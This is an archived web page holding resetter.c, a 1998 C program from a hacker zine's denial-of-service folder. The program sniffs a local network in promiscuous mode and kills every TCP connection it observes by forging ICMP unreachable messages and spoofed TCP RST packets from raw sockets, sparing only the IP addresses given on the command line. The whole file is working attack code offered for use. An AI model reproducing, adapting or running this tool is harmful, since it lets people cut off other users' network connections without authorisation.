home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Freaks Macintosh Archive
/
Freaks Macintosh Archive.bin
/
Freaks Macintosh Archives
/
Textfiles
/
zines
/
Happle
/
happle10.sit.hqx
/
Happle#10
/
Files
/
Denial.sit
/
DoS
/
resetter.c
< prev
next >
Wrap
Text File
|
1998-12-23
|
9KB
|
351 lines
/* resetter.c 11 feb 1998 by Stok */
/* large parts ripped from "ipl.c" and "puke.c".. */
/* code clean-up for c5 release 22 nov 1998 */
/* windows NT (at least 4.0) seems to ignore the icmp-packets?! */
/* added tcp RST connection resetting 30 nov 1998 */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <string.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <netdb.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <netinet/if_ether.h>
#include <unistd.h>
#include <net/if.h>
#include <stdlib.h>
#include <arpa/inet.h>
#define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct icmphdr) + \
sizeof(struct iphdr) + 8)
#define ICMPSIZE (sizeof(struct icmphdr) + sizeof(struct iphdr) + 8)
#define offsetTCP (sizeof(struct iphdr) + sizeof(struct icmphdr) + \
sizeof(struct iphdr))
#define offsetIP (sizeof(struct iphdr) + sizeof(struct icmphdr))
#define offsetICMP (sizeof(struct iphdr))
#define thecode 10
struct sigaction new_sa, old_sa;
void sigint (int);
struct etherpacket
{
struct ethhdr eth;
struct iphdr ip;
char data[60000];
};
int initdevice (char *, int);
void printdata (char *, long);
u_short cksum (u_short * buf, int nwords);
void sendkill (long fromhost, int fromport, long tohost, int toport);
void killtcp (struct iphdr *);
char device[] = "eth0";
long *ignores;
int
main (int argc, char **argv)
{
int if_eth_fd = initdevice (device, 1);
struct etherpacket ep;
struct sockaddr dest;
struct iphdr *ip;
struct tcphdr *tcp;
fd_set rd;
int dlen, cnt;
new_sa.sa_handler = &sigint;
sigemptyset (&new_sa.sa_mask);
new_sa.sa_flags = 0;
sigaction (SIGINT, &new_sa, &old_sa);
if (argc == 1)
{
printf ("Usage:\n");
printf ("%s ignore-ip [...]\n", argv[0]);
initdevice (device, 0);
exit (-1);
}
ignores = (long *) calloc ((size_t) argc, sizeof (long));
argc--;
for (cnt = 0; cnt < argc; cnt++)
ignores[cnt] = inet_addr (argv[cnt+1]);
while (1)
{
bzero (&dest, sizeof (dest));
dlen = 0;
FD_ZERO (&rd);
FD_SET (if_eth_fd, &rd);
ip = (struct iphdr *) (((unsigned long) &ep.ip) - 2);
tcp = (struct tcphdr *) (((unsigned long) &ep.data) - 2);
select (if_eth_fd + 1, &rd, NULL, NULL, NULL);
recvfrom (if_eth_fd, &ep, sizeof (ep), 0, &dest, &dlen);
for (cnt = 0; ignores[cnt]; cnt++)
if (ip->saddr == ignores[cnt] || ip->daddr == ignores[cnt])
{
cnt = 44538;
break;
}
if (cnt != 44538)
if (ep.eth.h_proto == ntohs (ETH_P_IP) && ip->protocol == 6)
{
sendkill (ip->saddr, ntohs (tcp->source), ip->daddr, ntohs (tcp->dest));
sendkill (ip->daddr, ntohs (tcp->dest), ip->saddr, ntohs (tcp->source));
if (!(tcp->rst || tcp->fin))
killtcp (ip);
}
}
}
#define PROTO htons(ETH_P_IP)
int
initdevice (char *device, int pflag)
{
int if_fd = 0;
struct ifreq ifr;
if ((if_fd = socket (AF_INET, SOCK_PACKET, PROTO)) < 0)
{
perror ("Can't get socket");
exit (1);
}
strncpy (ifr.ifr_name, device, IFNAMSIZ);
if (ioctl (if_fd, SIOCGIFFLAGS, &ifr) < 0)
{
close (if_fd);
perror ("Can't get flags");
exit (1);
}
if (pflag)
ifr.ifr_flags |= IFF_PROMISC;
else
ifr.ifr_flags &= ~(IFF_PROMISC);
if (ioctl (if_fd, SIOCSIFFLAGS, &ifr) < 0)
{
close (if_fd);
perror ("Can't set flags");
exit (1);
}
return (if_fd);
}
void
sigint (int a)
{
printf ("\nSIGINT caught. Exiting.\n");
initdevice (device, 0);
exit (0);
}
/* Not much of this function is mine // Stok */
void
sendkill (long fromhost, int fromport, long tohost, int toport)
{
char *packet;
struct sockaddr_in local, remote;
static int sock = 0;
// printf ("%X %X -> %X %X\n", fromhost, fromport, tohost, toport);
memcpy (&(local.sin_port), &fromport, sizeof (int));
memcpy (&(remote.sin_port), &toport, sizeof (int));
memcpy (&(local.sin_addr), &fromhost, sizeof (long));
memcpy (&(remote.sin_addr), &tohost, sizeof (long));
local.sin_family = AF_INET;
remote.sin_family = AF_INET;
if (!sock)
{
sock = socket (AF_INET, SOCK_RAW, 255);
if (sock == -1)
{
perror ("Getting raw socket");
exit (-1);
}
}
/*
. Get memory for the packet
*/
packet = (char *) malloc (PACKETSIZE);
if (!packet)
{
perror ("Getting space for packet");
exit (-1);
}
/*
. Fill in our pretended TCP header
. note - since this was allegedly an outgoing packet... we have
. to flip the source and destination stuff
*/
{
struct tcphdr *fake_tcp;
fake_tcp = (struct tcphdr *) (packet + offsetTCP);
fake_tcp->dest = htons (fromport);
fake_tcp->source = htons (toport);
fake_tcp->seq = 0x1984;
}
/*
. fill in the fake IP header.
. the same reversal as above still applies.. the packet was sent
. to our machine (yeah right)
*/
{
struct iphdr *fake_ip;
fake_ip = (struct iphdr *) (packet + offsetIP);
/* these fields are irrelevant -- never checked?? */
fake_ip->version = 4;
/* this was much longer.. once */
fake_ip->tot_len = htons (0x2C);
fake_ip->tos = 0;
fake_ip->id = htons (getpid () & 255);
fake_ip->frag_off = 0;
fake_ip->ttl = 24; /* not so long to live anymore */
/* this CAN'T be checked..so do something != 0 */
fake_ip->check = 3805;
/* these fields are used .. */
fake_ip->ihl = 5;
bcopy ((char *) &local.sin_addr, &fake_ip->daddr,
sizeof (fake_ip->daddr));
bcopy ((char *) &remote.sin_addr, &fake_ip->saddr,
sizeof (fake_ip->saddr));
fake_ip->protocol = 6; /* a TCP packet */
}
/*
. fill in the ICMP header
. this is actally rather trivial, though don't forget the checksum
*/
{
struct icmphdr *icmp;
icmp = (struct icmphdr *) (packet + offsetICMP);
icmp->type = 3;
icmp->code = thecode; /* this will generate an error message */
icmp->un.gateway = 0;
icmp->checksum = cksum ((u_short *) (icmp), ICMPSIZE >> 1);
}
/*
. finally, fill in the IP header
. this is almost the same as above.. though this time, it is the
. ip header that really takes the packet places. make sure the
. checksum and addresses are right
*/
{
struct iphdr *real_ip;
real_ip = (struct iphdr *) packet;
real_ip->version = 4;
real_ip->ihl = 5;
real_ip->tot_len = htons (PACKETSIZE);
real_ip->tos = (7 << 5) | 4;
real_ip->ttl = 255;
real_ip->protocol = 1;
real_ip->check = 0;
real_ip->id = htons (3);
real_ip->frag_off = 0;
bcopy ((char *) &local.sin_addr, &real_ip->saddr,
sizeof (real_ip->saddr));
bcopy ((char *) &remote.sin_addr, &real_ip->daddr,
sizeof (real_ip->daddr));
/*
real_ip->saddr = htonl(ntohl(real_ip->daddr) & 0xffffff00L);
*/
real_ip->check = cksum ((u_short *) packet,
sizeof (struct iphdr) >> 1);
}
/*
.
. and now.. finally... send it out into the net
*/
{
int result;
result = sendto (sock, packet, PACKETSIZE, 0,
(struct sockaddr *) &remote, sizeof (remote));
if (result != PACKETSIZE)
{
perror ("sending packet");
}
free (packet);
}
}
void
killtcp (struct iphdr *ip)
{
char *packet;
static int sock = 0;
struct tcphdr *tcp;
int result;
struct sockaddr_in remote;
u_int32_t tmp32;
// u_int16_t tmp16;
packet = (char *) malloc (sizeof (struct iphdr) + sizeof (struct tcphdr));
tcp = (struct tcphdr *) (packet + sizeof (struct iphdr));
memcpy (&(remote.sin_port), &(tcp->dest), sizeof (int));
memcpy (&(remote.sin_addr), &(ip->daddr), sizeof (long));
remote.sin_family = AF_INET;
memcpy (packet, (char *) ip, sizeof (struct iphdr) + sizeof (struct tcphdr));
if (!sock)
{
sock = socket (AF_INET, SOCK_RAW, 255);
if (sock == -1)
{
perror ("Getting raw socket");
exit (-1);
}
}
tcp->fin = 0;
tcp->syn = 0;
tcp->rst = 1;
tcp->psh = 0;
tcp->ack = 0;
tcp->urg = 0;
tmp32 = tcp->ack_seq;
tcp->ack_seq = htonl (ntohl (tcp->seq)+1);
tcp->seq = tmp32;
/* tmp16 = tcp->source;
tcp->source = tcp->dest;
tcp->dest = tmp16;
tmp32 = ip->saddr;
ip->saddr = ip->daddr;
ip->daddr = tmp32;
*/
ip->check = cksum ((u_short *) packet, sizeof (struct iphdr) >> 1);
result = sendto (sock, packet, sizeof (struct iphdr) + sizeof (struct tcphdr), 0, &remote, sizeof (remote));
free (packet);
}
u_short
cksum (u_short * buf, int nwords)
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}